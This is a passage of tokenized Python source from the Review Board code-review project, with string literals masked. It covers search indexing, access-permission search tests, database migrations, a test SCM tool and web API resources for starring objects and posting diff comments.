expected_revision <EOL> else : <EOL> expected_url += ( '<STR_LIT>' <EOL> % expected_revision ) <EOL> self . assertEqual ( url , expected_url ) <EOL> if expected_found : <EOL> return b'<STR_LIT:{}>' , { } <EOL> else : <EOL> raise HTTPError ( ) <EOL> account = self . _get_hosting_account ( ) <EOL> service = account . service <EOL> repository = Repository ( hosting_account = account , <EOL> tool = Tool . objects . get ( name = tool_name ) ) <EOL> repository . extra_data = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> service . authorize ( '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> self . spy_on ( service . client . http_get , call_fake = _http_get ) <EOL> result = service . get_file_exists ( repository , '<STR_LIT>' , revision , <EOL> base_commit_id ) <EOL> self . assertTrue ( service . client . http_get . called ) <EOL> self . assertEqual ( result , expected_found ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> from django import forms <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from djblets . integrations . forms import ( IntegrationConfigForm as <EOL> DjbletsIntegrationConfigForm ) <EOL> from reviewboard . site . models import LocalSite <EOL> class IntegrationConfigForm ( DjbletsIntegrationConfigForm ) : <EOL> """<STR_LIT>""" <EOL> model_fields = ( <EOL> DjbletsIntegrationConfigForm . model_fields + <EOL> ( '<STR_LIT>' , ) <EOL> ) <EOL> local_site = forms . ModelChoiceField ( <EOL> label = _ ( '<STR_LIT>' ) , <EOL> queryset = LocalSite . objects . all ( ) , <EOL> required = False ) </s>
<s> from __future__ import unicode_literals <EOL> from django_evolution . mutations import AddField <EOL> from djblets . db . fields import JSONField <EOL> MUTATIONS = [ <EOL> AddField ( '<STR_LIT>' , '<STR_LIT>' , JSONField , null = True ) , <EOL> AddField ( '<STR_LIT>' , '<STR_LIT>' , JSONField , null = True ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django_evolution . mutations import AddField <EOL> from django . db import models <EOL> MUTATIONS = [ <EOL> AddField ( '<STR_LIT>' , '<STR_LIT>' , models . BooleanField , <EOL> initial = False ) , <EOL> AddField ( '<STR_LIT>' , '<STR_LIT>' , models . BooleanField , <EOL> initial = False ) , <EOL> AddField ( '<STR_LIT>' , '<STR_LIT>' , models . BooleanField , <EOL> initial = False ) , <EOL> AddField ( '<STR_LIT>' , '<STR_LIT>' , models . BooleanField , initial = False ) , <EOL> AddField ( '<STR_LIT>' , '<STR_LIT>' , models . BooleanField , initial = False ) , <EOL> AddField ( '<STR_LIT>' , '<STR_LIT>' , models . BooleanField , <EOL> initial = False ) <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . contrib . auth . models import AnonymousUser <EOL> from django . db . models import Q <EOL> from djblets . util . templatetags . djblets_utils import user_displayname <EOL> from haystack import indexes <EOL> from reviewboard . reviews . models import ReviewRequest <EOL> from reviewboard . search . indexes import BaseSearchIndex <EOL> class ReviewRequestIndex ( BaseSearchIndex , indexes . Indexable ) : <EOL> """<STR_LIT>""" <EOL> model = ReviewRequest <EOL> local_site_attr = '<STR_LIT>' <EOL> review_request_id = indexes . IntegerField ( model_attr = '<STR_LIT>' ) <EOL> summary = indexes . CharField ( model_attr = '<STR_LIT>' ) <EOL> description = indexes . CharField ( model_attr = '<STR_LIT:description>' ) <EOL> testing_done = indexes . CharField ( model_attr = '<STR_LIT>' ) <EOL> bug = indexes . CharField ( model_attr = '<STR_LIT>' ) <EOL> username = indexes . CharField ( model_attr = '<STR_LIT>' ) <EOL> user_display_name = indexes . CharField ( ) <EOL> author = indexes . CharField ( model_attr = '<STR_LIT>' ) <EOL> last_updated = indexes . DateTimeField ( model_attr = '<STR_LIT>' ) <EOL> url = indexes . CharField ( model_attr = '<STR_LIT>' ) <EOL> file = indexes . CharField ( ) <EOL> private = indexes . BooleanField ( ) <EOL> private_repository_id = indexes . IntegerField ( ) <EOL> private_target_groups = indexes . MultiValueField ( ) <EOL> target_users = indexes . MultiValueField ( ) <EOL> def get_model ( self ) : <EOL> """<STR_LIT>""" <EOL> return ReviewRequest <EOL> def get_updated_field ( self ) : <EOL> return '<STR_LIT>' <EOL> def index_queryset ( self , using = None ) : <EOL> """<STR_LIT>""" <EOL> queryset = self . get_model ( ) . objects . public ( <EOL> status = None , <EOL> extra_query = Q ( status = '<STR_LIT:P>' ) | Q ( status = '<STR_LIT:S>' ) , <EOL> show_all_local_sites = True , <EOL> filter_private = False ) <EOL> queryset = queryset . select_related ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> queryset = queryset . prefetch_related ( <EOL> '<STR_LIT>' ) <EOL> return queryset <EOL> def prepare_file ( self , obj ) : <EOL> return set ( [ <EOL> ( filediff . source_file , filediff . dest_file ) <EOL> for diffset in obj . diffset_history . diffsets . all ( ) <EOL> for filediff in diffset . files . all ( ) <EOL> ] ) <EOL> def prepare_private ( self , review_request ) : <EOL> """<STR_LIT>""" <EOL> return not review_request . is_accessible_by ( AnonymousUser ( ) , <EOL> silent = True ) <EOL> def prepare_private_repository_id ( self , review_request ) : <EOL> """<STR_LIT>""" <EOL> if review_request . repository and not review_request . repository . public : <EOL> return review_request . repository_id <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def prepare_private_target_groups ( self , review_request ) : <EOL> """<STR_LIT>""" <EOL> queryset = review_request . target_groups . filter ( invite_only = True ) <EOL> return list ( queryset . values_list ( '<STR_LIT>' , flat = True ) ) or [ <NUM_LIT:0> ] <EOL> def prepare_target_users ( self , review_request ) : <EOL> """<STR_LIT>""" <EOL> pks = list ( review_request . target_people . values_list ( '<STR_LIT>' , flat = True ) ) <EOL> return pks or [ <NUM_LIT:0> ] <EOL> def prepare_user_display_name ( self , obj ) : <EOL> return user_displayname ( obj . submitter ) </s>
<s> from __future__ import unicode_literals <EOL> from django_evolution . mutations import AddField , ChangeMeta <EOL> from django . db import models <EOL> MUTATIONS = [ <EOL> AddField ( '<STR_LIT>' , '<STR_LIT>' , models . BooleanField , initial = False ) , <EOL> AddField ( '<STR_LIT>' , '<STR_LIT>' , models . DateTimeField , <EOL> null = True ) , <EOL> ChangeMeta ( '<STR_LIT>' , '<STR_LIT>' , <EOL> ( ( '<STR_LIT:name>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:path>' , '<STR_LIT>' ) ) ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . contrib . auth . models import User <EOL> from django . contrib . sites . models import Site <EOL> from django . core . management import call_command <EOL> from djblets . siteconfig . models import SiteConfiguration <EOL> from djblets . testing . decorators import add_fixtures <EOL> from reviewboard . admin . server import build_server_url <EOL> from reviewboard . admin . siteconfig import load_site_config <EOL> from reviewboard . site . urlresolvers import local_site_reverse <EOL> from reviewboard . testing . testcase import TestCase <EOL> class SearchTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> fixtures = [ '<STR_LIT>' ] <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> """<STR_LIT>""" <EOL> siteconfig = SiteConfiguration . objects . get_current ( ) <EOL> siteconfig . set ( '<STR_LIT>' , True ) <EOL> siteconfig . save ( ) <EOL> load_site_config ( ) <EOL> def test_search_all ( self ) : <EOL> """<STR_LIT>""" <EOL> review_request = self . create_review_request ( submitter = '<STR_LIT>' , <EOL> publish = True ) <EOL> self . reindex ( ) <EOL> response = self . search ( '<STR_LIT>' ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:2> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . username , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:1> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:1> ] . summary , review_request . summary ) <EOL> def test_filter_review_requests ( self ) : <EOL> """<STR_LIT>""" <EOL> review_request = self . create_review_request ( submitter = '<STR_LIT>' , <EOL> publish = True ) <EOL> self . reindex ( ) <EOL> response = self . search ( '<STR_LIT>' , filter_by = '<STR_LIT>' ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . summary , review_request . summary ) <EOL> def test_filter_users ( self ) : <EOL> """<STR_LIT>""" <EOL> self . create_review_request ( submitter = '<STR_LIT>' , publish = True ) <EOL> self . reindex ( ) <EOL> response = self . search ( '<STR_LIT>' , filter_by = '<STR_LIT>' ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . username , '<STR_LIT>' ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_review_requests_without_private_repo_access ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> repository = self . create_repository ( public = False ) <EOL> review_request = self . create_review_request ( repository = repository , <EOL> publish = True ) <EOL> self . assertFalse ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:0> ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_review_requests_with_private_repo_access ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> repository = self . create_repository ( public = False ) <EOL> repository . users . add ( user ) <EOL> review_request = self . create_review_request ( repository = repository , <EOL> publish = True ) <EOL> self . assertTrue ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . summary , review_request . summary ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_review_requests_with_private_repo_access_through_group ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> group = self . create_review_group ( invite_only = True ) <EOL> group . users . add ( user ) <EOL> repository = self . create_repository ( public = False ) <EOL> repository . review_groups . add ( group ) <EOL> review_request = self . create_review_request ( repository = repository , <EOL> publish = True ) <EOL> self . assertTrue ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . summary , review_request . summary ) <EOL> def test_review_requests_without_private_group_access ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> group = self . create_review_group ( invite_only = True ) <EOL> review_request = self . create_review_request ( publish = True ) <EOL> review_request . target_groups . add ( group ) <EOL> self . assertFalse ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:0> ) <EOL> def test_review_requests_with_private_group_access ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> group = self . create_review_group ( invite_only = True ) <EOL> group . users . add ( user ) <EOL> review_request = self . create_review_request ( publish = True ) <EOL> review_request . target_groups . add ( group ) <EOL> self . assertTrue ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . summary , review_request . summary ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_review_requests_with_private_repo_access_no_private_group ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> group = self . create_review_group ( invite_only = True ) <EOL> repository = self . create_repository ( public = False ) <EOL> repository . users . add ( user ) <EOL> review_request = self . create_review_request ( repository = repository , <EOL> publish = True ) <EOL> review_request . target_groups . add ( group ) <EOL> self . assertFalse ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:0> ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_review_requests_with_private_repository_as_submitter ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> repository = self . create_repository ( public = False ) <EOL> repository . users . add ( user ) <EOL> review_request = self . create_review_request ( repository = repository , <EOL> submitter = user , <EOL> publish = True ) <EOL> self . assertTrue ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . summary , review_request . summary ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_review_requests_with_private_repository_and_target_people ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> repository = self . create_repository ( public = False ) <EOL> review_request = self . create_review_request ( repository = repository , <EOL> publish = True ) <EOL> review_request . target_people . add ( user ) <EOL> self . assertFalse ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:0> ) <EOL> def test_review_requests_with_private_group_and_target_people ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> group = self . create_review_group ( invite_only = True ) <EOL> review_request = self . create_review_request ( publish = True ) <EOL> review_request . target_groups . add ( group ) <EOL> review_request . target_people . add ( user ) <EOL> self . assertTrue ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . summary , review_request . summary ) <EOL> def test_search_review_request_id ( self ) : <EOL> """<STR_LIT>""" <EOL> site = Site . objects . get_current ( ) <EOL> site . domain = '<STR_LIT>' <EOL> site . save ( ) <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> review_request = self . create_review_request ( publish = True ) <EOL> self . assertTrue ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( '<STR_LIT>' % review_request . id ) <EOL> self . assertEqual ( response . url , <EOL> build_server_url ( review_request . get_absolute_url ( ) ) ) <EOL> def test_search_numeric_non_id ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> review_request = self . create_review_request ( bugs_closed = '<STR_LIT>' , <EOL> publish = True ) <EOL> self . assertTrue ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( '<STR_LIT>' ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . summary , review_request . summary ) <EOL> def reindex ( self ) : <EOL> """<STR_LIT>""" <EOL> call_command ( '<STR_LIT>' , interactive = False ) <EOL> def search ( self , q , filter_by = None ) : <EOL> """<STR_LIT>""" <EOL> options = { <EOL> '<STR_LIT:q>' : q , <EOL> } <EOL> if filter_by : <EOL> options [ '<STR_LIT>' ] = filter_by <EOL> return self . client . get ( local_site_reverse ( '<STR_LIT>' ) , options ) </s>
<s> from __future__ import unicode_literals <EOL> from django . utils import six <EOL> from django . utils . six . moves import range <EOL> from reviewboard . scmtools . core import Branch , Commit , ChangeSet <EOL> from reviewboard . scmtools . git import GitTool <EOL> class TestTool ( GitTool ) : <EOL> name = '<STR_LIT>' <EOL> supports_post_commit = True <EOL> def get_repository_info ( self ) : <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def get_fields ( self ) : <EOL> return [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def get_diffs_use_absolute_paths ( self ) : <EOL> return False <EOL> def get_branches ( self ) : <EOL> return [ <EOL> Branch ( id = '<STR_LIT>' , commit = '<STR_LIT:5>' , default = True ) , <EOL> Branch ( id = '<STR_LIT>' , commit = '<STR_LIT>' , default = False ) , <EOL> ] <EOL> def get_commits ( self , branch = None , start = None ) : <EOL> return [ <EOL> Commit ( '<STR_LIT>' % i , six . text_type ( i ) , <EOL> '<STR_LIT>' % i , <EOL> '<STR_LIT>' % i , <EOL> six . text_type ( i - <NUM_LIT:1> ) ) <EOL> for i in range ( int ( start or <NUM_LIT:10> ) , <NUM_LIT:0> , - <NUM_LIT:1> ) <EOL> ] <EOL> def get_change ( self , commit_id ) : <EOL> return Commit ( <EOL> author_name = '<STR_LIT>' , <EOL> id = commit_id , <EOL> date = '<STR_LIT>' , <EOL> message = '<STR_LIT>' , <EOL> diff = b'<STR_LIT:\n>' . join ( [ <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT>" <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT:->" , <EOL> b"<STR_LIT>" , <EOL> ] ) ) <EOL> def get_file ( self , path , revision ) : <EOL> return '<STR_LIT>' <EOL> def file_exists ( self , path , revision , ** kwargs ) : <EOL> if path == '<STR_LIT>' : <EOL> return True <EOL> return super ( TestTool , self ) . file_exists ( path , revision , ** kwargs ) <EOL> @ classmethod <EOL> def check_repository ( cls , path , * args , ** kwargs ) : <EOL> pass <EOL> class TestToolSupportsPendingChangeSets ( TestTool ) : <EOL> supports_pending_changesets = True <EOL> def get_changeset ( self , changesetid , allow_empty = False ) : <EOL> changeset = ChangeSet ( ) <EOL> changeset . changenum = changesetid <EOL> changeset . description = '<STR_LIT>' <EOL> changeset . pending = True <EOL> if not allow_empty : <EOL> changeset . files = [ '<STR_LIT>' ] <EOL> changeset . summary = '<STR_LIT>' '<STR_LIT>' <EOL> changeset . testing_done = "<STR_LIT>" <EOL> return changeset </s>
<s> from __future__ import unicode_literals <EOL> from django . contrib . auth . models import User <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> from django . http import HttpResponseRedirect <EOL> from django . utils import six <EOL> from djblets . webapi . decorators import ( webapi_login_required , <EOL> webapi_response_errors , <EOL> webapi_request_fields ) <EOL> from djblets . webapi . errors import ( DOES_NOT_EXIST , NOT_LOGGED_IN , <EOL> PERMISSION_DENIED ) <EOL> from reviewboard . accounts . models import Profile <EOL> from reviewboard . webapi . base import WebAPIResource <EOL> from reviewboard . webapi . decorators import ( webapi_check_local_site , <EOL> webapi_check_login_required ) <EOL> from reviewboard . webapi . resources import resources <EOL> class BaseWatchedObjectResource ( WebAPIResource ) : <EOL> """<STR_LIT>""" <EOL> watched_resource = None <EOL> uri_object_key = '<STR_LIT>' <EOL> profile_field = None <EOL> star_function = None <EOL> unstar_function = None <EOL> allowed_methods = ( '<STR_LIT:GET>' , '<STR_LIT:POST>' , '<STR_LIT>' ) <EOL> @ property <EOL> def uri_object_key_regex ( self ) : <EOL> return self . watched_resource . uri_object_key_regex <EOL> def get_queryset ( self , request , username , local_site_name = None , <EOL> * args , ** kwargs ) : <EOL> try : <EOL> local_site = self . _get_local_site ( local_site_name ) <EOL> if local_site : <EOL> user = local_site . users . get ( username = username ) <EOL> profile = user . get_profile ( ) <EOL> else : <EOL> profile = Profile . objects . get ( user__username = username ) <EOL> q = self . watched_resource . get_queryset ( <EOL> request , local_site_name = local_site_name , * args , ** kwargs ) <EOL> q = q . filter ( starred_by = profile ) <EOL> return q <EOL> except Profile . DoesNotExist : <EOL> return self . watched_resource . model . objects . none ( ) <EOL> @ webapi_check_login_required <EOL> def get ( self , request , watched_obj_id , * args , ** kwargs ) : <EOL> try : <EOL> q = self . get_queryset ( request , * args , ** kwargs ) <EOL> obj = self . get_watched_object ( q , watched_obj_id , * args , ** kwargs ) <EOL> except ObjectDoesNotExist : <EOL> return DOES_NOT_EXIST <EOL> return HttpResponseRedirect ( <EOL> self . watched_resource . get_href ( obj , request , * args , ** kwargs ) ) <EOL> @ webapi_check_login_required <EOL> @ webapi_response_errors ( DOES_NOT_EXIST ) <EOL> def get_list ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> objects = [ <EOL> self . serialize_object ( obj ) <EOL> for obj in self . get_queryset ( request , is_list = True , <EOL> * args , ** kwargs ) <EOL> ] <EOL> return <NUM_LIT:200> , { <EOL> self . list_result_key : objects , <EOL> } <EOL> except User . DoesNotExist : <EOL> return DOES_NOT_EXIST <EOL> @ webapi_check_local_site <EOL> @ webapi_login_required <EOL> @ webapi_response_errors ( DOES_NOT_EXIST , NOT_LOGGED_IN , PERMISSION_DENIED ) <EOL> @ webapi_request_fields ( required = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : six . text_type , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> def create ( self , request , object_id , * args , ** kwargs ) : <EOL> try : <EOL> obj_kwargs = kwargs . copy ( ) <EOL> obj_kwargs [ self . watched_resource . uri_object_key ] = object_id <EOL> obj = self . watched_resource . get_object ( request , * args , <EOL> ** obj_kwargs ) <EOL> user = resources . user . get_object ( request , * args , ** kwargs ) <EOL> except ObjectDoesNotExist : <EOL> return DOES_NOT_EXIST <EOL> if not resources . user . has_modify_permissions ( request , user , <EOL> * args , ** kwargs ) : <EOL> return self . get_no_access_error ( request ) <EOL> profile , profile_is_new = Profile . objects . get_or_create ( user = request . user ) <EOL> star = getattr ( profile , self . star_function ) <EOL> star ( obj ) <EOL> return <NUM_LIT> , { <EOL> self . item_result_key : obj , <EOL> } <EOL> @ webapi_check_local_site <EOL> @ webapi_login_required <EOL> def delete ( self , request , watched_obj_id , * args , ** kwargs ) : <EOL> try : <EOL> obj_kwargs = kwargs . copy ( ) <EOL> obj_kwargs [ self . watched_resource . uri_object_key ] = watched_obj_id <EOL> obj = self . watched_resource . get_object ( request , * args , <EOL> ** obj_kwargs ) <EOL> user = resources . user . get_object ( request , * args , ** kwargs ) <EOL> except ObjectDoesNotExist : <EOL> return DOES_NOT_EXIST <EOL> if not resources . user . has_modify_permissions ( request , user , <EOL> * args , ** kwargs ) : <EOL> return self . get_no_access_error ( request ) <EOL> profile , profile_is_new = Profile . objects . get_or_create ( user = request . user ) <EOL> if not profile_is_new : <EOL> unstar = getattr ( profile , self . unstar_function ) <EOL> unstar ( obj ) <EOL> return <NUM_LIT> , { } <EOL> def serialize_object ( self , obj , * args , ** kwargs ) : <EOL> return { <EOL> '<STR_LIT:id>' : obj . pk , <EOL> self . item_result_key : obj , <EOL> } <EOL> def get_watched_object ( self , queryset , obj_id , * args , ** kwargs ) : <EOL> return queryset . get ( pk = obj_id ) </s>
<s> from __future__ import unicode_literals <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> from djblets . util . decorators import augment_method_from <EOL> from djblets . webapi . decorators import ( webapi_login_required , <EOL> webapi_response_errors , <EOL> webapi_request_fields ) <EOL> from djblets . webapi . errors import ( DOES_NOT_EXIST , INVALID_FORM_DATA , <EOL> NOT_LOGGED_IN , PERMISSION_DENIED ) <EOL> from reviewboard . diffviewer . models import FileDiff <EOL> from reviewboard . webapi . decorators import webapi_check_local_site <EOL> from reviewboard . webapi . resources import resources <EOL> from reviewboard . webapi . resources . base_diff_comment import BaseDiffCommentResource <EOL> class ReviewDiffCommentResource ( BaseDiffCommentResource ) : <EOL> """<STR_LIT>""" <EOL> allowed_methods = ( '<STR_LIT:GET>' , '<STR_LIT:POST>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> policy_id = '<STR_LIT>' <EOL> model_parent_key = '<STR_LIT>' <EOL> mimetype_list_resource_name = '<STR_LIT>' <EOL> mimetype_item_resource_name = '<STR_LIT>' <EOL> def get_queryset ( self , request , review_id , * args , ** kwargs ) : <EOL> q = super ( ReviewDiffCommentResource , self ) . get_queryset ( <EOL> request , * args , ** kwargs ) <EOL> return q . filter ( review = review_id ) <EOL> @ webapi_check_local_site <EOL> @ webapi_login_required <EOL> @ webapi_response_errors ( DOES_NOT_EXIST , INVALID_FORM_DATA , <EOL> NOT_LOGGED_IN , PERMISSION_DENIED ) <EOL> @ webapi_request_fields ( <EOL> required = dict ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : int , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : int , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : int , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> } , <EOL> } , ** BaseDiffCommentResource . REQUIRED_CREATE_FIELDS ) , <EOL> optional = dict ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : int , <EOL> '<STR_LIT:description>' : '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> } , <EOL> } , ** BaseDiffCommentResource . OPTIONAL_CREATE_FIELDS ) , <EOL> allow_unknown = True , <EOL> ) <EOL> def create ( self , request , filediff_id , interfilediff_id = None , <EOL> * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> review_request = resources . review_request . get_object ( request , * args , ** kwargs ) <EOL> review = resources . review . get_object ( request , * args , ** kwargs ) <EOL> except ObjectDoesNotExist : <EOL> return DOES_NOT_EXIST <EOL> if not resources . review . has_modify_permissions ( request , review ) : <EOL> return self . get_no_access_error ( request ) <EOL> filediff = None <EOL> interfilediff = None <EOL> invalid_fields = { } <EOL> try : <EOL> filediff = FileDiff . objects . get ( <EOL> pk = filediff_id , <EOL> diffset__history__review_request = review_request ) <EOL> except ObjectDoesNotExist : <EOL> invalid_fields [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> if filediff and interfilediff_id : <EOL> if interfilediff_id == filediff . id : <EOL> invalid_fields [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> else : <EOL> try : <EOL> interfilediff = FileDiff . objects . get ( <EOL> pk = interfilediff_id , <EOL> diffset__history = filediff . diffset . history ) <EOL> except ObjectDoesNotExist : <EOL> invalid_fields [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> if invalid_fields : <EOL> return INVALID_FORM_DATA , { <EOL> '<STR_LIT>' : invalid_fields , <EOL> } <EOL> new_comment = self . create_comment ( <EOL> review = review , <EOL> filediff = filediff , <EOL> interfilediff = interfilediff , <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ** kwargs ) <EOL> review . comments . add ( new_comment ) <EOL> return <NUM_LIT> , { <EOL> self . item_result_key : new_comment , <EOL> } <EOL> @ webapi_check_local_site <EOL> @ webapi_login_required <EOL> @ webapi_response_errors ( DOES_NOT_EXIST , NOT_LOGGED_IN , PERMISSION_DENIED ) 